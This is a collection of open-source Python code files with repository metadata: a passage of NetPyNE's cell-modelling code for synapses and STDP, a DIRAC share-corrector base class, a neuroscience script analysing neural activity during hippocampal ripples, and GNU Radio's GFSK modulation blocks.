rand.Random123(sim.hashStr('connSynMechsSecs'), self.gid, preGid) # initialize randomizer
pos = int(rand.discunif(0, len(synMechSecs)-1))
synMechSecs[pos], synMechSecs[0] = synMechSecs[0], synMechSecs[pos]
if len(synMechLocs)>1:
synMechLocs[pos], synMechLocs[0] = synMechLocs[0], synMechLocs[pos]
# add synaptic mechanism to section based on synMechSecs and synMechLocs (if already exists won't be added)
synMechs = [self.addSynMech(synLabel=params['synMech'], secLabel=synMechSecs[i], loc=synMechLocs[i]) for i in range(synsPerConn)]
return synMechs, synMechSecs, synMechLocs
def _distributeSynsUniformly (self, secList, numSyns):
from .. import sim
from numpy import cumsum
if 'L' in self.secs[secList[0]]['geom']:
secLengths = [self.secs[s]['geom']['L'] for s in secList]
elif getattr(self.secs[secList[0]]['hObj'], 'L', None):
secLengths = [self.secs[s]['hObj'].L for s in secList]
else:
secLengths = [1.0 for s in secList]
if sim.cfg.verbose:
print((' Section lengths not available to distribute synapses in cell %d'%self.gid))
try:
totLength = sum(secLengths)
cumLengths = list(cumsum(secLengths))
absLocs = [i*(totLength/numSyns)+totLength/numSyns/2 for i in range(numSyns)]
inds = [cumLengths.index(next(x for x in cumLengths if x >= absLoc)) for absLoc in absLocs]
secs = [secList[ind] for ind in inds]
locs = [(cumLengths[ind] - absLoc) / secLengths[ind] for absLoc,ind in zip(absLocs,inds)]
except:
secs, locs = [],[]
return secs, locs
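    # Worked example (hypothetical numbers): with secList=['dend0','dend1'], lengths
    # [100., 300.] and numSyns=4: totLength=400, cumLengths=[100, 400], absLocs=
    # [50, 150, 250, 350] -> secs=['dend0','dend1','dend1','dend1']. Note that locs
    # are computed as (cumLengths[ind]-absLoc)/secLengths[ind], i.e. measured from
    # the distal end of each section.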
def _addConnPlasticity (self, params, sec, netcon, weightIndex):
from .. import sim
plasticity = params.get('plast')
if plasticity and sim.cfg.createNEURONObj:
try:
plastMech = getattr(h, plasticity['mech'], None)(0, sec=sec['hObj']) # create plasticity mechanism (eg. h.STDP)
for plastParamName,plastParamValue in plasticity['params'].items(): # add params of the plasticity mechanism
setattr(plastMech, plastParamName, plastParamValue)
if plasticity['mech'] == 'STDP': # specific implementation steps required for the STDP mech
precon = sim.pc.gid_connect(params['preGid'], plastMech); precon.weight[0] = 1 # Send presynaptic spikes to the STDP adjuster
pstcon = sim.pc.gid_connect(self.gid, plastMech); pstcon.weight[0] = -1 # Send postsynaptic spikes to the STDP adjuster
h.setpointer(netcon._ref_weight[weightIndex], 'synweight', plastMech) # Associate the STDP adjuster with this weight
#self.conns[-1]['hPlastSection'] = plastSection
self.conns[-1]['hSTDP'] = plastMech
self.conns[-1]['hSTDPprecon'] = precon
self.conns[-1]['hSTDPpstcon'] = pstcon
self.conns[-1]['STDPdata'] = {'preGid':params['preGid'], 'postGid': self.gid, 'receptor': weightIndex} # Not used; FYI only; store here just so it's all in one place
if sim.cfg.verbose: print(' Added STDP plasticity to synaptic mechanism')
except:
print('Error: exception when adding plasticity using %s mechanism' % (plasticity['mech']))
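    # Illustrative (hypothetical) plasticity spec consumed by _addConnPlasticity();
    # 'mech' must name a mechanism available on h (e.g. a compiled STDP .mod file),
    # and the parameter names below are assumptions for the example only:
    # connParams['plast'] = {'mech': 'STDP', 'params': {'hebbwt': 0.01, 'antiwt': -0.01}}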
def getSomaPos(self):
''' Get soma position;
Used to calculate seg coords for LFP calc (one per population cell; assumes same morphology)'''
n3dsoma = 0
r3dsoma = np.zeros(3)
for sec in [sec for secName, sec in self.secs.items() if 'soma' in secName]:
sec['hObj'].push()
n3d = int(h.n3d()) # get number of n3d points in each section
r3d = np.zeros((3, n3d)) # to hold locations of 3D morphology for the current section
n3dsoma += n3d
for i in range(n3d):
r3dsoma[0] += h.x3d(i)
r3dsoma[1] += h.y3d(i)
r3dsoma[2] += h.z3d(i)
h.pop_section()
r3dsoma /= n3dsoma
return r3dsoma
def calcAbsSegCoords(self):
''' Calculate absolute seg coords by translating the relative seg coords -- used for LFP calc'''
from .. import sim
p3dsoma = self.getSomaPos()
pop = self.tags['pop']
morphSegCoords = sim.net.pops[pop]._morphSegCoords
# rotated coordinates around z axis first then shift relative to the soma
self._segCoords = {}
p3dsoma = p3dsoma[np.newaxis].T # transpose 1d array to enable matrix calculation
self._segCoords['p0'] = p3dsoma + morphSegCoords['p0']
self._segCoords['p1'] = p3dsoma + morphSegCoords['p1']
def setImembPtr(self):
"""Set PtrVector to point to the i_membrane_"""
jseg = 0
for sec in list(self.secs.values()):
hSec = sec['hObj']
for iseg, seg in enumerate(hSec):
self.imembPtr.pset(jseg, seg._ref_i_membrane_) # notice the underscore at the end (in nA)
jseg += 1
def getImemb(self):
"""Gather membrane currents from PtrVector into imVec (does not need a loop!)"""
self.imembPtr.gather(self.imembVec)
return self.imembVec.as_numpy() # (nA)
def updateShape(self):
"""Call after h.define_shape() to update cell coords"""
x = self.tags['x']
y = -self.tags['y'] # Neuron y-axis positive = upwards, so assume pia=0 and cortical depth = neg
z = self.tags['z']
for sec in list(self.secs.values()):
if 'geom' in sec and 'pt3d' not in sec['geom']: # only cells that didn't have pt3d before
sec['geom']['pt3d'] = []
sec['hObj'].push()
n3d = int(h.n3d()) # get number of n3d points in each section
for i in range(n3d):
# by default L is added in x-axis; shift to y-axis; z increases 100um for each cell so set to 0
pt3d = [h.y3d(i), h.x3d(i), 0, h.diam3d(i)]
sec['geom']['pt3d'].append(pt3d)
h.pt3dchange(i, x+pt3d[0], y+pt3d[1], z+pt3d[2], pt3d[3], sec=sec['hObj'])
h.pop_section()
|
thekerrlab/netpyne
|
netpyne/cell/compartCell.py
|
Python
|
mit
| 67,771
|
[
"NEURON"
] |
cdaae240cdadac0f4a7eac9fce8b11bda6a209467c870fcb25ccb51f03e8f38b
|
""" Base corrector for the group and ingroup shares
"""
from DIRAC import S_OK, S_ERROR
__RCSID__ = "$Id$"
class BaseCorrector(object):
def __init__(self, opsHelper, baseCSPath, group):
self.__opsHelper = opsHelper
self.__baseCSPath = baseCSPath
self.__group = group
def initialize(self):
return S_OK()
def getCSOption(self, opName, defValue=None):
return self.__opsHelper.getValue("%s/%s" % (self.__baseCSPath, opName), defValue)
def getiCSOptions(self, opName=""):
return self.__opsHelper.getSections("%s/%s" % (self.__baseCSPath, opName))
def getCSSections(self, secName=""):
return self.__opsHelper.getSections("%s/%s" % (self.__baseCSPath, secName))
def getGroup(self):
return self.__group
def updateHistoryKnowledge(self):
return S_OK()
def applyCorrection(self, entitiesExpectedShare):
return S_ERROR("applyCorrection function has not been implemented")
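# Minimal sketch (not part of DIRAC) of how a concrete corrector might subclass
# BaseCorrector; the option name 'GlobalBoost' and the returned structure are
# assumptions for illustration only:
#
# class FlatCorrector(BaseCorrector):
#     def applyCorrection(self, entitiesExpectedShare):
#         boost = float(self.getCSOption("GlobalBoost", 1.0))
#         return S_OK(dict((k, v * boost) for k, v in entitiesExpectedShare.items()))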
|
chaen/DIRAC
|
WorkloadManagementSystem/private/correctors/BaseCorrector.py
|
Python
|
gpl-3.0
| 929
|
[
"DIRAC"
] |
e2f8d605f08d864eb429aae52ab7a1cfa33e866bc7e620408142512785482932
|
#!/usr/bin/env python
'''
File name: main_ripp_mod.py
Author: Guillaume Viejo
Date created: 16/08/2017
Python Version: 3.5.2
'''
import sys
import numpy as np
import pandas as pd
import scipy.io
from functions import *
# from pylab import *
from multiprocessing import Pool
import os
import neuroseries as nts
from time import time
from pylab import *
from functions import quickBin
from numba import jit
import _pickle as cPickle
@jit(nopython=True)
def scalarProduct(r):
tmp = np.sqrt(np.power(r, 2).sum(1))
denom = tmp[0:-1] * tmp[1:]
num = np.sum(r[0:-1]*r[1:], 1)
return num/(denom)
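# scalarProduct(r) returns, for each pair of consecutive time bins, the cosine
# similarity between the population rate vectors (rows of r). Tiny illustrative
# check (hypothetical values):
# scalarProduct(np.array([[1., 0.], [1., 0.], [0., 1.]])) -> array([1., 0.])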
@jit(nopython=True)
def quickBin(spikelist, ts, bins, index):
rates = np.zeros((len(ts), len(bins)-1, len(index)))
for i, t in enumerate(ts):
tbins = t + bins
for j in range(len(spikelist)):
a, _ = np.histogram(spikelist[j], tbins)
rates[i,:,j] = a
return rates
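# quickBin bins each neuron's spike times into windows centered on every trigger
# time in ts, returning shape (len(ts), len(bins)-1, len(index)); 'index' is used
# only for its length. Illustrative call (hypothetical data):
# quickBin([np.array([1., 5.])], np.array([0.]), np.arange(-10., 11., 2.), np.arange(1))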
data_directory = '/mnt/DataGuillaume/MergedData/'
datasets = np.loadtxt(data_directory+'datasets_ThalHpc.list', delimiter = '\n', dtype = str, comments = '#')
anglehd = {}
anglenohd = {}
zanglehd = {}
zanglenohd = {}
for session in datasets:
print(session)
generalinfo = scipy.io.loadmat(data_directory+session+'/Analysis/GeneralInfo.mat')
shankStructure = loadShankStructure(generalinfo)
if len(generalinfo['channelStructure'][0][0][1][0]) == 2:
hpc_channel = generalinfo['channelStructure'][0][0][1][0][1][0][0] - 1
else:
hpc_channel = generalinfo['channelStructure'][0][0][1][0][0][0][0] - 1
spikes,shank = loadSpikeData(data_directory+session+'/Analysis/SpikeData.mat', shankStructure['thalamus'])
wake_ep = loadEpoch(data_directory+session, 'wake')
sleep_ep = loadEpoch(data_directory+session, 'sleep')
sws_ep = loadEpoch(data_directory+session, 'sws')
rem_ep = loadEpoch(data_directory+session, 'rem')
sleep_ep = sleep_ep.merge_close_intervals(threshold=1.e3)
sws_ep = sleep_ep.intersect(sws_ep)
rem_ep = sleep_ep.intersect(rem_ep)
rip_ep,rip_tsd = loadRipples(data_directory+session)
rip_ep = sws_ep.intersect(rip_ep)
rip_tsd = rip_tsd.restrict(sws_ep)
hd_info = scipy.io.loadmat(data_directory+session+'/Analysis/HDCells.mat')['hdCellStats'][:,-1]
hd_info_neuron = np.array([hd_info[n] for n in spikes.keys()])
####################################################################################################################
# binning data
####################################################################################################################
spikeshd = {k:spikes[k] for k in np.where(hd_info_neuron==1)[0] if k not in []}
spikesnohd = {k:spikes[k] for k in np.where(hd_info_neuron==0)[0] if k not in []}
hdneurons = np.sort(list(spikeshd.keys()))
nohdneurons = np.sort(list(spikesnohd.keys()))
bin_size = 40
n_ex = 2000
rnd_tsd = nts.Ts(t = np.sort(np.hstack([np.random.randint(sws_ep.loc[i,'start']+500000, sws_ep.loc[i,'end']+500000, np.maximum(1,n_ex//len(sws_ep))) for i in sws_ep.index])))
####################################################################################################################
# MEAN AND STD SWS
####################################################################################################################
# # mean and standard deviation during SWS
# mean_sws = pd.DataFrame(index = np.sort(list(spikes.keys())), columns = ['min', 'max'])
# for n in spikes.keys():
# r = []
# for e in sws_ep.index:
# bins = np.arange(sws_ep.loc[e,'start'], sws_ep.loc[e,'end'], bin_size*1e3)
# a, _ = np.histogram(spikes[n].restrict(sws_ep.loc[[e]]).index.values, bins)
# r.append(a)
# r = np.hstack(r)
# r = r / (bin_size*1e-3)
# mean_sws.loc[n,'min']= r.min()
# mean_sws.loc[n,'max']= r.max()
bins = np.arange(0, 2000+2*bin_size, bin_size) - 1000 - bin_size/2
times = bins[0:-1] + np.diff(bins)/2
####################################################################################################################
# HD NEURONS
####################################################################################################################
if len(spikeshd) >=5:
ts = rip_tsd.as_units('ms').index.values
rates = quickBin([spikeshd[j].as_units('ms').index.values for j in hdneurons], ts, bins, hdneurons)
# # rates = rates /float(bin_size*1e-3)
# angle = pd.DataFrame(index = times[0:-1], columns = np.arange(len(rip_tsd)))
# for i, r in enumerate(rates):
# tmp = scalarProduct(r)
# angle[i] = tmp
# random
ts = rnd_tsd.as_units('ms').index.values
rates2 = quickBin([spikeshd[j].as_units('ms').index.values for j in hdneurons], ts, bins, hdneurons)
# # rates2 = rates2/float(bin_size*1e-3)
# shuffled = pd.DataFrame(index = times[0:-1], columns = np.arange(len(rnd_tsd)))
# for i, r in enumerate(rates2):
# tmp = scalarProduct(r)
# shuffled[i] = tmp
# anglehd[session] = (angle.mean(1) - shuffled.mean(1))/shuffled.mean(1)
# normalized
zangle = pd.DataFrame(index = times[0:-1], columns = np.arange(len(rip_tsd)))
min_ = rates.min(0).min(0)
max_ = rates.max(0).max(0)
zrates = (rates - min_) / (max_ - min_)
for i, r in enumerate(zrates):
tmp = scalarProduct(r)
zangle[i] = tmp
# random
zshuffled = pd.DataFrame(index = times[0:-1], columns = np.arange(len(rnd_tsd)))
min_ = rates2.min(0).min(0)
max_ = rates2.max(0).max(0)
zrates2 = (rates2 - min_) / (max_ - min_)
for i, r in enumerate(zrates2):
tmp = scalarProduct(r)
zshuffled[i] = tmp
zanglehd[session] = (zangle.mean(1) - zshuffled.mean(1))/zshuffled.mean(1)
anglehd[session] = zangle #.fillna(0)
####################################################################################################################
# NO HD NEURONS
####################################################################################################################
if len(spikesnohd) >=5:
ts = rip_tsd.as_units('ms').index.values
rates = quickBin([spikesnohd[j].as_units('ms').index.values for j in nohdneurons], ts, bins, nohdneurons)
# # rates = rates/float(bin_size*1e-3)
# angle = pd.DataFrame(index = times[0:-1], columns = np.arange(len(rip_tsd)))
# for i, r in enumerate(rates):
# angle[i] = scalarProduct(r)
# random
ts = rnd_tsd.as_units('ms').index.values
rates2 = quickBin([spikesnohd[j].as_units('ms').index.values for j in nohdneurons], ts, bins, nohdneurons)
# # rates2 = rates2/float(bin_size*1e-3)
# shuffled = pd.DataFrame(index = times[0:-1], columns = np.arange(len(rnd_tsd)))
# for i, r in enumerate(rates2):
# shuffled[i] = scalarProduct(r)
# anglenohd[session] = (angle.mean(1) - shuffled.mean(1))/shuffled.mean(1)
# normalized
zangle = pd.DataFrame(index = times[0:-1], columns = np.arange(len(rip_tsd)))
min_ = rates.min(0).min(0)
max_ = rates.max(0).max(0)
zrates = (rates - min_) / (max_ - min_)
for i, r in enumerate(zrates):
zangle[i] = scalarProduct(r)
# random
zshuffled = pd.DataFrame(index = times[0:-1], columns = np.arange(len(rnd_tsd)))
# zrates2 = (rates2 - m) / (s+1)
min_ = rates2.min(0).min(0)
max_ = rates2.max(0).max(0)
zrates2 = (rates2 - min_) / (max_ - min_)
for i, r in enumerate(zrates2):
zshuffled[i] = scalarProduct(r)
zanglenohd[session] = (zangle.mean(1) - zshuffled.mean(1))/zshuffled.mean(1)
anglenohd[session] = zangle #.fillna(0)
# anglehd = pd.DataFrame.from_dict(anglehd)
# anglenohd = pd.DataFrame.from_dict(anglenohd)
# anglehd = anglehd.rolling(window=10,win_type='gaussian',center=True,min_periods=1, axis = 0).mean(std=1)
# anglenohd = anglenohd.rolling(window=10,win_type='gaussian',center=True,min_periods=1, axis = 0).mean(std=1)
zanglehd = pd.DataFrame.from_dict(zanglehd)
zanglenohd = pd.DataFrame.from_dict(zanglenohd)
zanglehd = zanglehd.rolling(window=10,win_type='gaussian',center=True,min_periods=1, axis = 0).mean(std=1)
zanglenohd = zanglenohd.rolling(window=10,win_type='gaussian',center=True,min_periods=1, axis = 0).mean(std=1)
# subplot(211)
# plot(anglehd.mean(1), label = 'hd')
# plot(anglenohd.mean(1), label = 'no hd')
# legend()
# title("Scalar product")
# subplot(212)
figure()
plot(zanglehd.mean(1), label = 'hd')
plot(zanglenohd.mean(1), label = 'no hd')
legend()
title("Scalar product + norm [0 1]")
# comparing with isomap radius
path = '../figures/figures_articles_v4/figure1/'
files = [f for f in os.listdir(path) if '.pickle' in f and 'Mouse' in f]
files.remove("Mouse17-130129.pickle")
radius = []
velocity = []
stability = []
order = []
for f in files:
data = cPickle.load(open(path+f, 'rb'))
swrvel = []
swrrad = []
for n in data['swr'].keys():
iswr = data['swr'][n]['iswr']
rip_tsd = data['swr'][n]['rip_tsd']
times = data['swr'][n]['times']
normswr = np.sqrt(np.sum(np.power(iswr, 2), -1))
normswr = pd.DataFrame(index = times, columns = rip_tsd.index.values.astype('int'), data = normswr.T)
swrrad.append(normswr)
angswr = np.arctan2(iswr[:,:,1], iswr[:,:,0])
angswr = (angswr + 2*np.pi)%(2*np.pi)
tmp = []
for i in range(len(angswr)):
a = np.unwrap(angswr[i])
b = pd.Series(index = times, data = a)
c = b.rolling(window = 10, win_type='gaussian', center=True, min_periods=1).mean(std=1.0)
tmp.append(np.abs(np.diff(c.values))/0.1)
tmp = pd.DataFrame(index = times[0:-1] + np.diff(times)/2, columns = rip_tsd.index.values.astype('int'), data = np.array(tmp).T)
swrvel.append(tmp)
swrvel = pd.concat(swrvel, 1)
swrrad = pd.concat(swrrad, 1)
swrvel = swrvel.sort_index(1)
swrrad = swrrad.sort_index(1)
s = f.split('-')[0]+'/'+ f.split('.')[0]
stab = anglehd[s]
# cutting between -500 to 500
stab = stab.loc[-500:500]
# aligning swrrad.index to stab.index
newswrrad = []
for i in swrrad.columns:
y = swrrad[i].values
if len(y.shape) ==2 :
print("Bug in ", f)
y = y[:,0]
fi = scipy.interpolate.interp1d(swrrad.index.values, y)
newswrrad.append(fi(stab.index.values))
newswrrad = pd.DataFrame(index = stab.index.values, columns = swrrad.columns, data = np.array(newswrrad).T)
newswrvel = []
for i in swrvel.columns:
y = swrvel[i].values
if len(y.shape) ==2 :
y = y[:,0]
fi = scipy.interpolate.interp1d(swrvel.index.values, y)
newswrvel.append(fi(stab.index.values))
newswrvel = pd.DataFrame(index = stab.index.values, columns = swrvel.columns, data = np.array(newswrvel).T)
radius.append(newswrrad.mean(1))
stability.append(stab.mean(1))
velocity.append(newswrvel.mean(1))
order.append(f)
radius = pd.concat(radius, 1)
stability = pd.concat(stability, 1)
velocity = pd.concat(velocity, 1)
stability = stability.apply(scipy.stats.zscore)
radius = radius.apply(scipy.stats.zscore)
velocity = velocity.apply(scipy.stats.zscore)
figure()
subplot(231)
for i in radius.columns:
plot(radius[i])
title("Radius")
subplot(232)
for i in velocity.columns:
plot(velocity[i])
title("Ang velocity")
subplot(233)
for i in stability.columns:
plot(stability[i])
title("Stability")
subplot(234)
for i in radius.columns:
scatter(radius[i], stability[i])
xlabel("Radius")
ylabel("Stability")
subplot(235)
for i in radius.columns:
scatter(velocity[i], stability[i])
xlabel("velocity")
ylabel("Stability")
tosave = {'velocity':velocity,
'radius':radius}
show()
sys.exit()
store = pd.HDFStore('../figures/figures_articles_v4/figure2/test.h5')
if normed:
store.append('anglehd_normed', anglehd)
store.append('anglenohd_normed', anglenohd)
else:
store.append('anglehd', anglehd)
store.append('anglenohd', anglenohd)
store.close()
figure()
store = pd.HDFStore('../figures/figures_articles_v4/figure2/test.h5')
subplot(2,2,1)
plot(store['anglehd'].mean(1), label = 'HD')
plot(store['anglenohd'].mean(1), label = 'non-HD')
legend()
title("Scalar Product")
subplot(2,2,2)
plot(store['pearsonhd'].mean(1), label = 'HD')
plot(store['pearsonnohd'].mean(1), label = 'non-HD')
legend()
title("Pearson Correlation")
subplot(2,2,3)
plot(store['anglehd_normed'].mean(1), label = 'HD')
plot(store['anglenohd_normed'].mean(1), label = 'non-HD')
legend()
title("Scalar Product normalized")
subplot(2,2,4)
plot(store['pearsonhd_normed'].mean(1), label = 'HD')
plot(store['pearsonnohd_normed'].mean(1), label = 'non-HD')
legend()
title("Pearson Correlation normalized")
show()
sys.exit()
anglehd = pd.DataFrame.from_dict(anglehd)
anglenohd = pd.DataFrame.from_dict(anglenohd)
plot(anglehd.mean(1), label = 'hd')
plot(anglenohd.mean(1), label = 'nohd')
legend()
show()
sys.exit()
datatosave = cPickle.load(open("/mnt/DataGuillaume/MergedData/SWR_SCALAR_PRODUCT.pickle", 'rb'))
angleall = datatosave['cosalpha']
baselineall = datatosave['baseline']
hd = pd.DataFrame()
for s in angleall.keys():
if 'hd' in list(angleall[s].keys()):
tmp1 = angleall[s]['hd'].rolling(window=100,win_type='gaussian',center=True,min_periods=1, axis = 0).mean(std=0.5)
tmp2 = baselineall[s]['hd'].rolling(window=100,win_type='gaussian',center=True,min_periods=1, axis = 0).mean(std=0.5)
tmp = (tmp1.mean(1) - tmp2.mean(1))/tmp2.mean(1)
hd[s.split("/")[1]] = tmp
nohd = pd.DataFrame()
for s in angleall.keys():
if 'nohd' in list(angleall[s].keys()):
tmp1 = angleall[s]['nohd'].rolling(window=100,win_type='gaussian',center=True,min_periods=1, axis = 0).mean(std=1)
tmp2 = baselineall[s]['nohd'].rolling(window=100,win_type='gaussian',center=True,min_periods=1, axis = 0).mean(std=1)
tmp = (tmp1.mean(1) - tmp2.mean(1))/tmp2.mean(1)
nohd[s.split("/")[1]] = tmp
data = pd.DataFrame(index = hd.index.values, columns = pd.MultiIndex.from_product([['hd', 'nohd'], ['mean', 'sem']]))
data['hd', 'mean'] = hd.mean(1)
data['hd', 'sem'] = hd.sem(1)
data['nohd', 'mean'] = nohd.mean(1)
data['nohd', 'sem'] = nohd.sem(1)
data.to_hdf("../figures/figures_articles_v4/figure2/SWR_SCALAR_PRODUCT.h5", 'w')
subplot(111)
m = hd.mean(1)
v = hd.sem(1)
plot(hd.mean(1), label = 'hd')
fill_between(hd.index.values, m+v, m-v, alpha = 0.5)
# title("Only hd")
# subplot(212)
# title("No hd")
m = nohd.mean(1)
v = nohd.sem(1)
plot(nohd.mean(1), label = 'nohd')
fill_between(nohd.index.values, m+v, m-v, alpha = 0.5)
legend()
figure()
subplot(121)
plot(hd, color = 'grey')
plot(hd.mean(1), color = 'red')
title("HD")
subplot(122)
plot(nohd, color = 'grey')
plot(nohd.mean(1), color = 'black')
title("No HD")
show()
|
gviejo/ThalamusPhysio
|
python/main_make_SWS_scalar_product.py
|
Python
|
gpl-3.0
| 14,308
|
[
"Gaussian"
] |
a30ff515be9adcb8aa14f7103d3361dbf84bf50414006f9d98c03bb5e437024b
|
#
# GFSK modulation and demodulation.
#
#
# Copyright 2005-2007,2012 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# SPDX-License-Identifier: GPL-3.0-or-later
#
#
# See gnuradio-examples/python/digital for examples
import numpy
from gnuradio import gr
from gnuradio import analog
from gnuradio import blocks, filter
from . import modulation_utils
from . import digital_python as digital
# default values (used in __init__ and add_options)
_def_samples_per_symbol = 2
_def_sensitivity = 1
_def_bt = 0.35
_def_verbose = False
_def_log = False
_def_gain_mu = None
_def_mu = 0.5
_def_freq_error = 0.0
_def_omega_relative_limit = 0.005
# FIXME: Figure out how to make GFSK work with pfb_arb_resampler_fff for both
# transmit and receive so we don't require integer samples per symbol.
# /////////////////////////////////////////////////////////////////////////////
# GFSK modulator
# /////////////////////////////////////////////////////////////////////////////
class gfsk_mod(gr.hier_block2):
def __init__(self,
samples_per_symbol=_def_samples_per_symbol,
sensitivity=_def_sensitivity,
bt=_def_bt,
verbose=_def_verbose,
log=_def_log):
"""
Hierarchical block for Gaussian Frequency Shift Key (GFSK)
modulation.
The input is a byte stream (unsigned char) and the
output is the complex modulated signal at baseband.
Args:
samples_per_symbol: samples per baud >= 2 (integer)
bt: Gaussian filter bandwidth * symbol time (float)
verbose: Print information about modulator? (bool)
log: Print modulation data to files? (bool)
"""
gr.hier_block2.__init__(self, "gfsk_mod",
gr.io_signature(1, 1, gr.sizeof_char), # Input signature
gr.io_signature(1, 1, gr.sizeof_gr_complex)) # Output signature
samples_per_symbol = int(samples_per_symbol)
self._samples_per_symbol = samples_per_symbol
self._bt = bt
self._differential = False
if not isinstance(samples_per_symbol, int) or samples_per_symbol < 2:
raise TypeError("samples_per_symbol must be an integer >= 2, is %r" % (samples_per_symbol,))
ntaps = 4 * samples_per_symbol # up to 3 bits in filter at once
#sensitivity = (pi / 2) / samples_per_symbol # phase change per bit = pi / 2
# Turn it into NRZ data.
#self.nrz = digital.bytes_to_syms()
self.unpack = blocks.packed_to_unpacked_bb(1, gr.GR_MSB_FIRST)
self.nrz = digital.chunks_to_symbols_bf([-1, 1])
# Form Gaussian filter
# Generate Gaussian response (Needs to be convolved with window below).
self.gaussian_taps = filter.firdes.gaussian(
1.0, # gain
samples_per_symbol, # symbol_rate
bt, # bandwidth * symbol time
ntaps # number of taps
)
self.sqwave = (1,) * samples_per_symbol # rectangular window
self.taps = numpy.convolve(numpy.array(self.gaussian_taps),numpy.array(self.sqwave))
self.gaussian_filter = filter.interp_fir_filter_fff(samples_per_symbol, self.taps)
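        # Pulse shaping note: convolving the ntaps Gaussian taps with the
        # samples_per_symbol-wide rectangular window yields a composite filter of
        # ntaps + samples_per_symbol - 1 taps (e.g. 9 taps for the defaults sps=2,
        # ntaps=8), applied while interpolating the NRZ symbols by sps.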
# FM modulation
self.fmmod = analog.frequency_modulator_fc(sensitivity)
# small amount of output attenuation to prevent clipping USRP sink
self.amp = blocks.multiply_const_cc(0.999)
if verbose:
self._print_verbage()
if log:
self._setup_logging()
# Connect & Initialize base class
self.connect(self, self.unpack, self.nrz, self.gaussian_filter, self.fmmod, self.amp, self)
def samples_per_symbol(self):
return self._samples_per_symbol
@staticmethod
def bits_per_symbol(self=None): # staticmethod that's also callable on an instance
return 1
def _print_verbage(self):
print("bits per symbol = %d" % self.bits_per_symbol())
print("Gaussian filter bt = %.2f" % self._bt)
def _setup_logging(self):
print("Modulation logging turned on.")
self.connect(self.nrz,
blocks.file_sink(gr.sizeof_float, "nrz.dat"))
self.connect(self.gaussian_filter,
blocks.file_sink(gr.sizeof_float, "gaussian_filter.dat"))
self.connect(self.fmmod,
blocks.file_sink(gr.sizeof_gr_complex, "fmmod.dat"))
@staticmethod
def add_options(parser):
"""
Adds GFSK modulation-specific options to the standard parser
"""
parser.add_option("", "--bt", type="float", default=_def_bt,
help="set bandwidth-time product [default=%default] (GFSK)")
@staticmethod
def extract_kwargs_from_options(options):
"""
Given command line options, create dictionary suitable for passing to __init__
"""
return modulation_utils.extract_kwargs_from_options(gfsk_mod.__init__,
('self',), options)
# /////////////////////////////////////////////////////////////////////////////
# GFSK demodulator
# /////////////////////////////////////////////////////////////////////////////
class gfsk_demod(gr.hier_block2):
def __init__(self,
samples_per_symbol=_def_samples_per_symbol,
sensitivity=_def_sensitivity,
gain_mu=_def_gain_mu,
mu=_def_mu,
omega_relative_limit=_def_omega_relative_limit,
freq_error=_def_freq_error,
verbose=_def_verbose,
log=_def_log):
"""
Hierarchical block for Gaussian Frequency Shift Key (GFSK)
demodulation.
The input is the complex modulated signal at baseband.
The output is a stream of bits packed 1 bit per byte (the LSB)
Args:
samples_per_symbol: samples per baud (integer)
verbose: Print information about modulator? (bool)
log: Print modulation data to files? (bool)
Clock recovery parameters. These all have reasonable defaults.
Args:
gain_mu: controls rate of mu adjustment (float)
mu: fractional delay [0.0, 1.0] (float)
omega_relative_limit: sets max variation in omega (float, typically 0.000200 (200 ppm))
freq_error: bit rate error as a fraction (float)
"""
gr.hier_block2.__init__(self, "gfsk_demod",
gr.io_signature(1, 1, gr.sizeof_gr_complex), # Input signature
gr.io_signature(1, 1, gr.sizeof_char)) # Output signature
self._samples_per_symbol = samples_per_symbol
self._gain_mu = gain_mu
self._mu = mu
self._omega_relative_limit = omega_relative_limit
self._freq_error = freq_error
self._differential = False
if samples_per_symbol < 2:
raise TypeError("samples_per_symbol >= 2, is %f" % samples_per_symbol)
self._omega = samples_per_symbol*(1+self._freq_error)
if not self._gain_mu:
self._gain_mu = 0.175
self._gain_omega = .25 * self._gain_mu * self._gain_mu # critically damped
# Demodulate FM
#sensitivity = (pi / 2) / samples_per_symbol
self.fmdemod = analog.quadrature_demod_cf(1.0 / sensitivity)
# the clock recovery block tracks the symbol clock and resamples as needed.
# the output of the block is a stream of soft symbols (float)
self.clock_recovery = digital.clock_recovery_mm_ff(self._omega, self._gain_omega,
self._mu, self._gain_mu,
self._omega_relative_limit)
# slice the floats at 0, outputting 1 bit (the LSB of the output byte) per sample
self.slicer = digital.binary_slicer_fb()
if verbose:
self._print_verbage()
if log:
self._setup_logging()
# Connect & Initialize base class
self.connect(self, self.fmdemod, self.clock_recovery, self.slicer, self)
def samples_per_symbol(self):
return self._samples_per_symbol
@staticmethod
def bits_per_symbol(self=None): # staticmethod that's also callable on an instance
return 1
def _print_verbage(self):
print("bits per symbol = %d" % self.bits_per_symbol())
print("M&M clock recovery omega = %f" % self._omega)
print("M&M clock recovery gain mu = %f" % self._gain_mu)
print("M&M clock recovery mu = %f" % self._mu)
print("M&M clock recovery omega rel. limit = %f" % self._omega_relative_limit)
print("frequency error = %f" % self._freq_error)
def _setup_logging(self):
print("Demodulation logging turned on.")
self.connect(self.fmdemod,
blocks.file_sink(gr.sizeof_float, "fmdemod.dat"))
self.connect(self.clock_recovery,
blocks.file_sink(gr.sizeof_float, "clock_recovery.dat"))
self.connect(self.slicer,
blocks.file_sink(gr.sizeof_char, "slicer.dat"))
@staticmethod
def add_options(parser):
"""
Adds GFSK demodulation-specific options to the standard parser
"""
parser.add_option("", "--gain-mu", type="float", default=_def_gain_mu,
help="M&M clock recovery gain mu [default=%default] (GFSK/PSK)")
parser.add_option("", "--mu", type="float", default=_def_mu,
help="M&M clock recovery mu [default=%default] (GFSK/PSK)")
parser.add_option("", "--omega-relative-limit", type="float", default=_def_omega_relative_limit,
help="M&M clock recovery omega relative limit [default=%default] (GFSK/PSK)")
parser.add_option("", "--freq-error", type="float", default=_def_freq_error,
help="M&M clock recovery frequency error [default=%default] (GFSK)")
@staticmethod
def extract_kwargs_from_options(options):
"""
Given command line options, create dictionary suitable for passing to __init__
"""
return modulation_utils.extract_kwargs_from_options(gfsk_demod.__init__,
('self',), options)
#
# Add these to the mod/demod registry
#
modulation_utils.add_type_1_mod('gfsk', gfsk_mod)
modulation_utils.add_type_1_demod('gfsk', gfsk_demod)
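# Illustrative (hypothetical) loopback sketch -- not part of the original module:
# from gnuradio import gr, blocks
# tb = gr.top_block()
# src = blocks.vector_source_b([0x55] * 1000, repeat=False)
# snk = blocks.vector_sink_b()
# tb.connect(src, gfsk_mod(samples_per_symbol=4), gfsk_demod(samples_per_symbol=4), snk)
# tb.run()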
|
trabucayre/gnuradio
|
